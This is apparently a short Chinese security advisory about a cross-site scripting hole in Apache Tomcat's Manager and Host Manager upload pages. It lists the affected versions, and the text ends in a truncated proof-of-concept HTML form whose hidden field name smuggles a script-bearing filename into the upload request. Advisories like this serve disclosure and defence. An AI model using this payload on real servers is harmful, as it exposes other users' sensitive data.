RootSSV:1880Apache Tomcat Manager和Host Manager上传跨站脚本漏洞
Apache Tomcat是一个流行的开放源码的JSP应用服务器程序。
Apache Tomcat包含的管理和主机管理WEB应用程序不正确处理URL数据,远程攻击者可以利用漏洞进行跨站脚本攻击,获得敏感信息。
提交恶意POST请求,由于不充分过滤,可导致提交恶意脚本代码作为参数,当其他用户解析时可泄露敏感信息。
Apache Tomcat 6.0.13
Apache Tomcat 6.0.12
Apache Tomcat 6.0.11
Apache Tomcat 6.0.10
Apache Tomcat 6.0.9
Apache Tomcat 6.0.8
Apache Tomcat 6.0.7
Apache Tomcat 6.0.6
Apache Tomcat 6.0.5
Apache Tomcat 6.0.4
Apache Tomcat 6.0.3
Apache Tomcat 6.0.2
Apache Tomcat 6.0.1
Apache Tomcat 5.5.24
Apache Tomcat 5.5.23
Apache Tomcat 5.5.22
Apache Tomcat 5.5.21
Apache Tomcat 5.5.20
Apache Tomcat 5.5.19
Apache Tomcat 5.5.18
Apache Tomcat 5.5.17
Apache Tomcat 5.5.16
Apache Tomcat 5.5.15
Apache Tomcat 5.5.14
Apache Tomcat 5.5.13
Apache Tomcat 5.5.12
Apache Tomcat 5.5.11
Apache Tomcat 5.5.10
Apache Tomcat 5.5.2
Apache Tomcat 5.5.1
Apache Tomcat 5.5
Apache Tomcat 5.0.30
Apache Tomcat 5.0.16
Apache Tomcat 5.0.15
Apache Tomcat 5.0.14
Apache Tomcat 5.0.13
Apache Tomcat 5.0.12
Apache Tomcat 5.0.11
Apache Tomcat 5.0.10
Apache Tomcat 5.0.3
Apache Tomcat 5.0.2
Apache Tomcat 5.0.1
Apache Tomcat 4.1.36
Apache Tomcat 4.1
Apache Tomcat 4.0.6
Apache Tomcat 4.0.5
Apache Tomcat 4.0.4
Apache Tomcat 4.0.3
Apache Tomcat 4.0.2
Apache Tomcat 4.0.1
Apache Tomcat 4.0
Apache Tomcat 5.0
目前没有解决方案提供:
<a href=“http://jakarta.apache.org/tomcat/” target=“_blank”>http://jakarta.apache.org/tomcat/</a>
<form action="http://example.com:8080/manager/html/upload"
method="post" enctype="multipart/form-data">
<INPUT TYPE="hidden"
NAME='deployWar";filename="<